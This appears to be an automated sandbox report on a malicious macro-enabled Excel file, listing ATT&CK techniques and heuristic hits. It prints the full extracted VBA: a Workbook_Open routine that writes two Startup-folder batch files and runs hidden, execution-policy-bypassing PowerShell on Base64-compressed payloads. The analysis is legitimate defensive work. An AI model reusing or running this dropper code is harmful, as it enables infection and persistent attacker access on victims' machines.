MALICIOUS
236
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a Workbook_Open macro that executes a PowerShell command. This command is obfuscated using Base64 encoding and is designed to download and execute a second-stage payload. The macro also creates two batch files in the startup directory, likely to ensure persistence. The PowerShell command reconstructs to: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("5VdLj+M2DL7nVwiBDwkmHsiyZMcbDLDbLgosUBQFZtAeghz8kDtGHSdInG1m2/73mlRIR5nptui1F1oSqY8fKerhoBQP4v10sv7Ytp+2+92hn01/tYfOtrG6r9p2Ot+I/alom1Ic+7wfPvbcD3rxqet/7A/ip+bQn/L2Q9vuytll7LeFODVdL86X78vl+2W++s9+vj3YvLd Pz8OnIj+nC+7nhRg9X1pXvi8jt963x8/lof83vrd2e7T97DUyRzV9Pwl2QyI/VFX49LK3IhzmFPbw0dZN1/TNr
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
argh = Shell("cmd /k " + Chr(34) + Path + Chr(34), vbHidden) -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
str = "" str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -" str = str + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() Dim str As String -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim username As String username = Environ$("UserName") -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12061 bytes |
SHA-256: 7e0daa4acd59546cb756565e88285ae4b67459dcbe6ac198b990e8c5db408c96 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
174 of 268 identifiers look randomly generated (e.g. 'lDDnQhPHUazxdUwvtsKivTLDgFPvVFAwywFBdmkY'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim str As String
Dim str2 As String
Dim Command As String
Dim exec As String
Dim username As String
username = Environ$("UserName")
Dim Path As String
Path = "C:\\Users\\" & username & "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\startup\\Windows.Storage.Search.bat"
Dim Path2 As String
Path2 = "C:\\Users\\" & username & "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\startup\\windows.UI.Core.bat"
Set FS = New FileSystemObject
Dim stream As TextStream
Dim stream2 As TextStream
' Create a TextStream.
Set stream = FS.CreateTextFile(Path, True)
Set stream2 = FS.CreateTextFile(Path2, True)
str = ""
str = str + "@echo off"
stream.WriteLine str
str = ""
str = str + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"
str = str + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-"
str = str + "Expression $(New-Object IO.StreamReader ($(New-Obj"
str = str + "ect IO.Compression.DeflateStream ($(New-Object IO."
str = str + "MemoryStream (,$([Convert]::FromBase64String(\" + Chr(34) + "5Vd"
str = str + "Lj+M2DL7nVwiBDwkmHsiyZMcbDLDbLgosUBQFZtAeghz8kDtGH"
str = str + "SdInG1m2/73mlRIR5nptui1F1oSqY8fKerhoBQP4v10sv7Ytp+"
str = str + "2+92hn01/tYfOtrG6r9p2Ot+I/alom1Ic+7wfPvbcD3rxqet/7"
str = str + "A/ip+bQn/L2Q9vuytll7LeFODVdL86X78vl+2W++s9+vj3YvLd"
str = str + "Pz8OnIj+nC+7nhRg9X1pXvi8jt963x8/lof83vrd2e7T97DUyR"
str = str + "zV9Pwl2QyI/VFX49LK3IhzmFPbw0dZN1/TNrhNBKcIf8q0V05+"
str = str + "bLlZTEXZD77jPSytw5LtTV4LlUYT7/Hjsnw+nSXB+CHbv3nlJl"
str = str + "gt5jqSET+w+Ws5XYv3NS2/Xm01whBWV57ocNHY5iGU2CDQcRSJ"
str = str + "JYQ0ARYOoFCg0KIpBGIUevK4svW7Exil0FXiT9SCKFGjlMJYQf"
str = str + "F1TqwTQHKBiEAmMpdCSiAItBSYlGsM0WYHALiBbsKsl0TCpz4o"
str = str + "5a0U+cG41KqCVYnIMEUo1cR6NzTgDjKMlO1oSSWccA6uYvOmM7"
str = str + "GLOkLP7ajb+Nt4YvFkkCXRrAJXgLQW7GrRxQV2lyQ7TZG44a49"
str = str + "zkjA/JF54xlHpGTu7m4i4kLQmeBSmIIHra8DEQHYNh48RoSNTk"
str = str + "xaRIyBukQvwMxBWAnaJBWFotVwpgyKFNCUZm6A3TVpdkgmWo0y"
str = str + "JQYVpwgz5+8PtK/QLdmnO8CULiEPhMgKKAr+4XbAscC8kMQEkA"
str = str + "JVKmobsHZ5iPEPLqNi5iamatCEFFo1zxC7HaeYmEZpDAEUaM7y"
str = str + "lDDnQhPHUazxdUwvtsKivTLDgFPvVFAwywFBdmkYfPmcdUajGE"
str = str + "APciDim+PhypfK/EC7ebHF9WuAC3ArQYo3HmDBIcQrT8psah7E"
str = str + "sXryqcdyh7hzKCM+B4kkY+2PgqOC9f4WCdrwb3YGMLoFBmXhcU"
str = str + "FHiiYmHVu6FircQnuMJJwIrIseTRpP2SkTcYgaIbMZ9WbzBICF"
str = str + "j3Puxnxx3N0pOhGZ46EY1JdudPgCqoZuBt6Uf7z+sIKMoPPShi"
str = str + "/dMesP55qJaesiorRPSukMaQqgzyobMyFEOIZTjDVG9kRxebnf"
str = str + "wYIqt5/Kt2FyuuDAxtnFRCg4aEyv9AIuacq+45VYfCaWU5zG2i"
str = str + "ld6mXtccCwy1MID1J3ybDIK9IYkMVS8K1BcvZZgLr43CjDJFcU"
str = str + "2ssfINRtL90p7jXJ1u4y7JyUt7v0caw33h/F84P41LFyJph6A5"
str = str + "AvodnNymeHlmiUMoL5WZiXUhrvtwYd7ksS+nSGmyN5tbHTEdTU"
str = str + "KXMur+1LRuqFQXGHObsljmrpSrib17iBmQfMgV0EjwtYOnWN5/"
str = str + "73tfumfw2g+jN7dzcXv8HK+PN3X7u2+mQXn+6fd0InVbH4XNPO"
str = str + "FGKaug2azENFc/CF2pz7sTm27+nMSfMG3t/fjMcS7CM4L+MCb+"
str = str + "7HPD3342Fq7F+GjLXddJeBpLuVf\" + Chr(34) + ")))), [IO.Compression"
str = str + ".CompressionMode]::Decompress)), [Text.Encoding]::"
str = str + "ASCII)).ReadToEnd();" + Chr(34) + ") else (%WinDir%\syswow64\win"
str = str + "dowspowershell\v1.0\powershell.exe -NoP -NonI -W H"
str = str + "idden -Exec Bypass -Command " + Chr(34) + "Invoke-Expression $(N"
str = str + "ew-Object IO.StreamReader ($(New-Object IO.Compres"
str = str + "sion.DeflateStream ($(New-Object IO.MemoryStream ("
str = str + ",$([Convert]::FromBase64String(\" + Chr(34) + "5VdLj+M2DL7nVwiBD"
str = str + "wkmHsiyZMcbDLDbLgosUBQFZtAeghz8kDtGHSdInG1m2/73mlR"
str = str + "IR5nptui1F1oSqY8fKerhoBQP4v10sv7Ytp+2+92hn01/tYfOt"
str = str + "rG6r9p2Ot+I/alom1Ic+7wfPvbcD3rxqet/7A/ip+bQn/L2Q9v"
str = str + "uytll7LeFODVdL86X78vl+2W++s9+vj3YvLdPz8OnIj+nC+7nh"
str = str + "Rg9X1pXvi8jt963x8/lof83vrd2e7T97DUyRzV9Pwl2QyI/VFX"
str = str + "49LK3IhzmFPbw0dZN1/TNrhNBKcIf8q0V05+bLlZTEXZD77jPS"
str = str + "ytw5LtTV4LlUYT7/Hjsnw+nSXB+CHbv3nlJlgt5jqSET+w+Ws5"
str = str + "XYv3NS2/Xm01whBWV57ocNHY5iGU2CDQcRSJJYQ0ARYOoFCg0K"
str = str + "IpBGIUevK4svW7Exil0FXiT9SCKFGjlMJYQfF1TqwTQHKBiEAm"
str = str + "MpdCSiAItBSYlGsM0WYHALiBbsKsl0TCpz4o5a0U+cG41KqCVY"
str = str + "nIMEUo1cR6NzTgDjKMlO1oSSWccA6uYvOmM7GLOkLP7ajb+Nt4"
str = str + "YvFkkCXRrAJXgLQW7GrRxQV2lyQ7TZG44a49zkjA/JF54xlHpG"
str = str + "Tu7m4i4kLQmeBSmIIHra8DEQHYNh48RoSNTkxaRIyBukQvwMxB"
str = str + "WAnaJBWFotVwpgyKFNCUZm6A3TVpdkgmWo0yJQYVpwgz5+8PtK"
str = str + "/QLdmnO8CULiEPhMgKKAr+4XbAscC8kMQEkAJVKmobsHZ5iPEP"
str = str + "LqNi5iamatCEFFo1zxC7HaeYmEZpDAEUaM7ylDDnQhPHUazxdU"
str = str + "wvtsKivTLDgFPvVFAwywFBdmkYfPmcdUajGEAPciDim+PhypfK"
str = str + "/EC7ebHF9WuAC3ArQYo3HmDBIcQrT8psah7EsXryqcdyh7hzKC"
str = str + "M+B4kkY+2PgqOC9f4WCdrwb3YGMLoFBmXhcUFHiiYmHVu6Firc"
str = str + "QnuMJJwIrIseTRpP2SkTcYgaIbMZ9WbzBICFj3Puxnxx3N0pOh"
str = str + "GZ46EY1JdudPgCqoZuBt6Uf7z+sIKMoPPShi/dMesP55qJaesi"
str = str + "orRPSukMaQqgzyobMyFEOIZTjDVG9kRxebnfwYIqt5/Kt2Fyuu"
str = str + "DAxtnFRCg4aEyv9AIuacq+45VYfCaWU5zG2ild6mXtccCwy1MI"
str = str + "D1J3ybDIK9IYkMVS8K1BcvZZgLr43CjDJFcU2ssfINRtL90p7j"
str = str + "XJ1u4y7JyUt7v0caw33h/F84P41LFyJph6A5AvodnNymeHlmiU"
str = str + "MoL5WZiXUhrvtwYd7ksS+nSGmyN5tbHTEdTUKXMur+1LRuqFQX"
str = str + "GHObsljmrpSrib17iBmQfMgV0EjwtYOnWN5/73tfumfw2g+jN7"
str = str + "dzcXv8HK+PN3X7u2+mQXn+6fd0InVbH4XNPOFGKaug2azENFc/"
str = str + "CF2pz7sTm27+nMSfMG3t/fjMcS7CM4L+MCb+7HPD3342Fq7F+G"
str = str + "jLXddJeBpLuVf\" + Chr(34) + ")))), [IO.Compression.CompressionMo"
str = str + "de]::Decompress)), [Text.Encoding]::ASCII)).ReadTo"
str = str + "End();" + Chr(34) + ")"
stream.WriteLine str
str = ""
' Close the file.
stream.Close
str2 = ""
str2 = str2 + "@echo off"
stream2.WriteLine str2
str2 = ""
str2 = str2 + "if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -"
str2 = str2 + "NoP -NonI -W Hidden -Exec Bypass -Command " + Chr(34) + "Invoke-"
str2 = str2 + "Expression $(New-Object IO.StreamReader ($(New-Obj"
str2 = str2 + "ect IO.Compression.DeflateStream ($(New-Object IO."
str2 = str2 + "MemoryStream (,$([Convert]::FromBase64String(\" + Chr(34) + "vVZ"
str2 = str2 + "Lj+M2DL7nVwiBDwnGHsiWX9lggN12UWCBoigwg/YQ5OCH3DHq2"
str2 = str2 + "IGtbDPb9r/XpEI6TruDQYH2QokiRX4iKUpOIR7E++Vi97FpPh2"
str2 = str2 + "OXW9Wy1913+pGBfdl0yzXe3E85U1diMFkZhz02Yxy8ak1P5pe/"
str2 = str2 + "FT35pQ1H5qmK1aXtd9ccapbI86X8eUyfllv/7Wfb3udGf30PA4"
str2 = str2 + "l+Tld7H52xeT5MrvyfVm59X4YPhe9eYvvgz4M2qz+bplPtXy/c"
str2 = str2 + "LoxkB/K0nt6OWrhjXty3X/UVd3Wpu5a4RTC+yE7aLH8uW5VsBR"
str2 = str2 + "eO3LDMSu0wJXvTm0BmoPwjtkwmOf+tHDOD0737t0syNKVZ19KG"
str2 = str2 + "JQdQrneit03L0bv9ntngIzKc1WMEp2OJN2MBBUnEksS6AgM+SM"
str2 = str2 + "pAxCEIMhHEgXoYcbKYsb6rJwAG4A3WY0kTwBWBmsxma8qmhVgN"
str2 = str2 + "ANTCkgMawnMJFqBWQAqBSrDNlkCQRYsa9CrJMGIkjkqxhwG5AP"
str2 = str2 + "3lpMAZgkGJyJASUiYJ+Vo2gHKfsqOUgJplRWgUuQt3JCe4ghZv"
str2 = str2 + "Vej8dXzKvCmESTArcCoBG8J6FUgVTmxQUh6GKboBnM4wxzHjA+"
str2 = str2 + "B5zNlv5gpW72bE3EhhSGZRxLlRDC/EahEEN2Ij48nQkdRRVK07"
str2 = str2 + "ANwjVgAX1TOYhVnlME8pHTHWHqS2KtCT8kbEpmwIJupIIwMgWM"
str2 = str2 + "uI9pRRlwHG84HY8kxKYwl3pAyGsXLFGtQURyIkKQhRDcBe3hJE"
str2 = str2 + "NrkMufQ3VxdjIt1lFIgUiAVlgAcKwGXKnjNSsr1HHKNW1bNpP9"
str2 = str2 + "k2c/+K8sYg7dYZvIGZcxbpTiDMWUBqzNVFFPJ2Z9q44aN2S+2q"
str2 = str2 + "qsyy6j0rrIPawW43BQ0m/J71XiwwnxGKvls6rWYKi4GrD9s9Zv"
str2 = str2 + "Ava52W/KSIjSRgGsSu54VQOzjiKQKWxW2tJQJKCu8AZu5lYhgI"
str2 = str2 + "InBLz4JaB714pIdKSbIxkzYuZVWtE1OjeJ/JZKv/ZQU2/owFT5"
str2 = str2 + "lRk71jPcSj8/1bFsQ9gg4YIZdOZ4VA6pgBn3O+VXBhWRAYVuX8"
str2 = str2 + "0JifBM0W+jAakwUd7OJpNhuMoJrH7mEygxvBT4s2OUxv5hzFGA"
str2 = str2 + "T9PkvoNheqRmQJim+7PbZwRrC3gkqOT8EeDlt801mxLaMCSm/9"
str2 = str2 + "ngvUzCgM/e60CeCyjb2IecSUBXFLH72oeIHSJVfsWd/KAnFVPt"
str2 = str2 + "0yquYgqDkPq6T7aLqerFy6ge5dWrhNXpkhuL+e93+Yp49fz2u3"
str2 = str2 + "t2txe/wy7t8M3f2n7lfOef7p25kVLBa3zn12hXj1p1T713hr8U"
str2 = str2 + "fojsZrz01zfbPhfMF/4mzT/KI2XXOLgzwP3w0WW+8x0bro/Aed"
str2 = str2 + "dG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO.Compression.Compression"
str2 = str2 + "Mode]::Decompress)), [Text.Encoding]::ASCII)).Read"
str2 = str2 + "ToEnd();" + Chr(34) + ") else (%WinDir%\syswow64\windowspowershe"
str2 = str2 + "ll\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec "
str2 = str2 + "Bypass -Command " + Chr(34) + "Invoke-Expression $(New-Object IO"
str2 = str2 + ".StreamReader ($(New-Object IO.Compression.Deflate"
str2 = str2 + "Stream ($(New-Object IO.MemoryStream (,$([Convert]"
str2 = str2 + "::FromBase64String(\" + Chr(34) + "vVZLj+M2DL7nVwiBDwnGHsiWX9lgg"
str2 = str2 + "N12UWCBoigwg/YQ5OCH3DHq2IGtbDPb9r/XpEI6TruDQYH2Qok"
str2 = str2 + "iRX4iKUpOIR7E++Vi97FpPh2OXW9Wy1913+pGBfdl0yzXe3E85"
str2 = str2 + "U1diMFkZhz02Yxy8ak1P5pe/FT35pQ1H5qmK1aXtd9ccapbI86"
str2 = str2 + "X8eUyfllv/7Wfb3udGf30PA4l+Tld7H52xeT5MrvyfVm59X4YP"
str2 = str2 + "he9eYvvgz4M2qz+bplPtXy/cLoxkB/K0nt6OWrhjXty3X/UVd3"
str2 = str2 + "Wpu5a4RTC+yE7aLH8uW5VsBReO3LDMSu0wJXvTm0BmoPwjtkwm"
str2 = str2 + "Of+tHDOD0737t0syNKVZ19KGJQdQrneit03L0bv9ntngIzKc1W"
str2 = str2 + "MEp2OJN2MBBUnEksS6AgM+SMpAxCEIMhHEgXoYcbKYsb6rJwAG"
str2 = str2 + "4A3WY0kTwBWBmsxma8qmhVgNANTCkgMawnMJFqBWQAqBSrDNlk"
str2 = str2 + "CQRYsa9CrJMGIkjkqxhwG5AP3lpMAZgkGJyJASUiYJ+Vo2gHKf"
str2 = str2 + "sqOUgJplRWgUuQt3JCe4ghZvVej8dXzKvCmESTArcCoBG8J6FU"
str2 = str2 + "gVTmxQUh6GKboBnM4wxzHjA+B5zNlv5gpW72bE3EhhSGZRxLlR"
str2 = str2 + "DC/EahEEN2Ij48nQkdRRVK07ANwjVgAX1TOYhVnlME8pHTHWHq"
str2 = str2 + "S2KtCT8kbEpmwIJupIIwMgWMuI9pRRlwHG84HY8kxKYwl3pAyG"
str2 = str2 + "sXLFGtQURyIkKQhRDcBe3hJENrkMufQ3VxdjIt1lFIgUiAVlgA"
str2 = str2 + "cKwGXKnjNSsr1HHKNW1bNpP9k2c/+K8sYg7dYZvIGZcxbpTiDM"
str2 = str2 + "WUBqzNVFFPJ2Z9q44aN2S+2qqsyy6j0rrIPawW43BQ0m/J71Xi"
str2 = str2 + "wwnxGKvls6rWYKi4GrD9s9ZvAva52W/KSIjSRgGsSu54VQOzji"
str2 = str2 + "KQKWxW2tJQJKCu8AZu5lYhgIInBLz4JaB714pIdKSbIxkzYuZV"
str2 = str2 + "WtE1OjeJ/JZKv/ZQU2/owFT5lRk71jPcSj8/1bFsQ9gg4YIZdO"
str2 = str2 + "Z4VA6pgBn3O+VXBhWRAYVuX80JifBM0W+jAakwUd7OJpNhuMoJ"
str2 = str2 + "rH7mEygxvBT4s2OUxv5hzFGAT9PkvoNheqRmQJim+7PbZwRrC3"
str2 = str2 + "gkqOT8EeDlt801mxLaMCSm/9ngvUzCgM/e60CeCyjb2IecSUBX"
str2 = str2 + "FLH72oeIHSJVfsWd/KAnFVPt0yquYgqDkPq6T7aLqerFy6ge5d"
str2 = str2 + "WrhNXpkhuL+e93+Yp49fz2u3t2txe/wy7t8M3f2n7lfOef7p25"
str2 = str2 + "kVLBa3zn12hXj1p1T713hr8UfojsZrz01zfbPhfMF/4mzT/KI2"
str2 = str2 + "XXOLgzwP3w0WW+8x0bro/AeddG1pYBvpJR/AQ==\" + Chr(34) + ")))), [IO"
str2 = str2 + ".Compression.CompressionMode]::Decompress)), [Text"
str2 = str2 + ".Encoding]::ASCII)).ReadToEnd();" + Chr(34) + ")"
stream2.WriteLine str2
str2 = ""
' Close the file.
stream2.Close
argh = Shell("cmd /k " + Chr(34) + Path + Chr(34), vbHidden)
argh = Shell("cmd /k " + Chr(34) + Path2 + Chr(34), vbHidden)
End Sub
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 33792 bytes |
SHA-256: 4a08c6be643bf13256fbb187e9ee176a9332b41c4bf3a21740edb454bd5c739c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
479 of 839 identifiers look randomly generated (e.g. 'uI9pRRlwHG84HY8kxKYwl3pAyGsXLFGtQURyIkKQ'); 4 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.